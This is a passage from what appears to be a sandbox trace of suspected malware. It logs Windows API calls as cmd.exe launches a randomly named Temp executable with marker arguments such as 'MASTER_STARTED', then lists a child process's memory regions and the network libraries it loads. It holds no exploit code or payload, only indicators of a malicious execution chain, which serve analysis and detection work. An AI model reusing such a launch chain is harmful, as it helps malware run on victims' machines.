lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.305] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.305] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.305] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.305] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.305] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.305] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.324] _close (_FileHandle=4) returned 0 [0094.324] FindNextFileW (in: hFindFile=0x300f68, lpFindFileData=0x26f4d8 | out: lpFindFileData=0x26f4d8) returned 0 [0094.324] GetLastError () returned 0x12 [0094.324] FindClose (in: hFindFile=0x300f68 | out: hFindFile=0x300f68) returned 1 [0094.324] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0094.406] _close (_FileHandle=3) returned 0 [0094.407] GetConsoleTitleW (in: lpConsoleTitle=0x26f974, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.407] GetFileAttributesW 
(lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe\"")) returned 0xffffffff [0094.407] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0094.407] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0094.407] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0094.407] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0094.407] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0094.407] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0094.407] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0094.407] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0094.407] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0094.407] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0094.407] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0094.407] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0094.407] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0094.407] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0094.407] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0094.407] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0094.407] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0094.407] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0094.407] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0094.407] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0094.407] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0094.407] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0094.408] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0094.408] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0094.408] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0094.408] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0094.408] _wcsicmp (_String1="\"C", _String2="VOL") 
returned -84 [0094.408] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0094.408] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0094.408] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0094.408] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0094.408] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0094.408] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0094.408] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0094.408] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0094.408] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0094.408] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0094.408] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0094.408] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0094.408] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0094.408] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0094.408] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0094.408] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0094.408] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0094.408] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0094.408] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0094.408] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0094.408] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0094.408] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0094.408] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0094.408] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0094.408] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0094.408] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0094.408] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0094.408] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0094.408] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0094.408] _wcsicmp 
(_String1="\"C", _String2="PROMPT") returned -78 [0094.408] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0094.408] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0094.409] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0094.409] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0094.409] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0094.409] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0094.409] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0094.409] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0094.409] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0094.409] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0094.409] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0094.409] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0094.409] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0094.409] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0094.409] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0094.409] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0094.409] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0094.409] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0094.409] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0094.409] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0094.409] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0094.409] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0094.409] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0094.409] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0094.409] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0094.409] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0094.409] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0094.409] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0094.409] _wcsicmp (_String1="\"C", _String2="IF") 
returned -71 [0094.409] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0094.409] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0094.410] SetErrorMode (uMode=0x0) returned 0x0 [0094.410] SetErrorMode (uMode=0x1) returned 0x0 [0094.410] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x3104c8, lpFilePart=0x26f494 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x26f494*="Temp") returned 0x23 [0094.410] SetErrorMode (uMode=0x0) returned 0x1 [0094.410] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0094.410] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.414] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.414] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", fInfoLevelId=0x1, lpFindFileData=0x26f230, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f230) returned 0x312488 [0094.414] FindClose (in: hFindFile=0x312488 | out: hFindFile=0x312488) returned 1 [0094.414] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0094.414] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0094.414] GetConsoleTitleW (in: lpConsoleTitle=0x26f708, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.415] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f590, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f658 | out: lpAttributeList=0x26f590, lpSize=0x26f658) returned 1 [0094.415] UpdateProcThreadAttribute (in: lpAttributeList=0x26f590, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f650, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f590, lpPreviousValue=0x0) returned 1 [0094.415] GetStartupInfoW (in: lpStartupInfo=0x26f54c 
| out: lpStartupInfo=0x26f54c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", 
_String2="PROCESS", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0094.416] lstrcmpW (lpString1="\\NhsgKr2p.exe", lpString2="\\XCOPY.EXE") returned -1 [0094.417] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f5ec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" 
\"MASTER_STARTED\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f638 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", lpProcessInformation=0x26f638*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb4c, dwThreadId=0xb50)) returned 1 [0094.980] CloseHandle (hObject=0x4c) returned 1 [0094.980] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0094.980] GetEnvironmentStringsW () returned 0x312cf8* [0094.980] FreeEnvironmentStringsW (penv=0x312cf8) returned 1 [0094.980] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0097.395] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f52c | out: lpExitCode=0x26f52c*=0x0) returned 1 [0097.395] CloseHandle (hObject=0x50) returned 1 [0097.395] _vsnwprintf (in: _Buffer=0x26f674, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f538 | out: _Buffer="00000000") returned 8 [0097.395] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0097.395] GetEnvironmentStringsW () returned 0x3124a8* [0097.395] FreeEnvironmentStringsW (penv=0x3124a8) returned 1 [0097.395] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0097.395] GetEnvironmentStringsW () returned 0x3124a8* [0097.396] FreeEnvironmentStringsW (penv=0x3124a8) returned 1 [0097.396] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f590 | out: lpAttributeList=0x26f590) [0097.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0097.396] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0097.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0097.396] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) 
returned 1 [0097.396] _get_osfhandle (_FileHandle=0) returned 0x3 [0097.396] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0097.397] SetConsoleInputExeNameW () returned 0x1 [0097.397] GetConsoleOutputCP () returned 0x1b5 [0097.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0097.397] SetThreadUILanguage (LangId=0x0) returned 0x409 [0097.397] exit (_Code=0) Process: id = "8" image_name = "cnuu8vyt.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe" page_root = "0x7ea166e0" os_pid = "0xae4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xac4" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 475 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 476 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 477 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 478 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 479 start_va = 0x77230000 
end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 480 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 481 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 482 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 483 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 486 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 487 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 488 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 489 start_va = 0x520000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 490 start_va = 0x6a0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 491 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 492 start_va = 0x75680000 end_va = 0x75720fff 
entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 493 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 494 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 495 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 496 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 497 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 498 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 499 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 500 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 501 
start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 502 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 503 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 504 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 505 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 506 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 507 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 508 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 509 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 510 start_va = 0x6b0000 end_va = 0x7b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 511 start_va = 0x7c0000 end_va = 0x13bffff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 512 start_va = 0x13c0000 end_va = 0x14fffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 513 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 514 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 515 start_va = 0x1500000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 563 start_va = 0x1620000 end_va = 0x18eefff entry_point = 0x1620000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 564 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 565 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 852 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x1d0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 853 start_va = 0x18f0000 end_va = 0x19effff entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 854 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = 
"\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 855 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 867 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 889 start_va = 0x19f0000 end_va = 0x1b2ffff entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 898 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 909 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1043 start_va = 0x19f0000 end_va = 0x1aeffff entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 1044 start_va = 0x1af0000 end_va = 0x1b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001af0000" filename = "" Region: id = 1045 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: 